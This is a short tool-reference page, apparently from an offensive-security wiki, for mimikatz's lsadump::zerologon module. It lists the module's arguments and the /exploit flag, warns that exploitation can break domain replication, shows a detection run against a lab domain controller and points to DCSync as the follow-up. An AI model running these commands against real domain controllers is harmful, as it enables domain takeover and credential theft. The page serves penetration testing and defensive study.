search

zerologon

lsadump::zerologon detects and exploits the ZeroLogonarrow-up-right vulnerability. It has the following command line arguments:

  • /account: the target DC SamAccountName

  • /target: the target DC FQDN

  • /exploit: proceed with exploitation

  • /null: null session authentication

  • /ntlm: use NTLM authentication

  • /type: The Secure Channel Types. The available values are:

    • Null

    • MsvAp

    • Workstation

    • TrustedDnsDomain

    • TrustedDomainUasServer

    • Server

    • CdcServer

triangle-exclamation

This technique can break the domain's replication services hence leading to massive disruption, running the following "password change" technique is not advised.

hashtag
Detection

mimikatz # lsadump::zerologon /target:dc.hacklab.local /account:dc$
[rpc] Remote   : dc.hacklab.local
[rpc] ProtSeq  : ncacn_ip_tcp
[rpc] AuthnSvc : NONE (0)
[rpc] NULL Sess: no

Target : dc.hacklab.local
Account: dc$
Type   : 6 (Server)
Mode   : detect

Trying to 'authenticate'...
=============================================================================================================================================================================================================================================

  NetrServerAuthenticate2: 0x00000000

* Authentication: OK -- vulnerable

hashtag
Exploitation

A DCSyncarrow-up-right can then be conducted with lsadump::dcsync.

PrevioustrustNextmisc

Last updated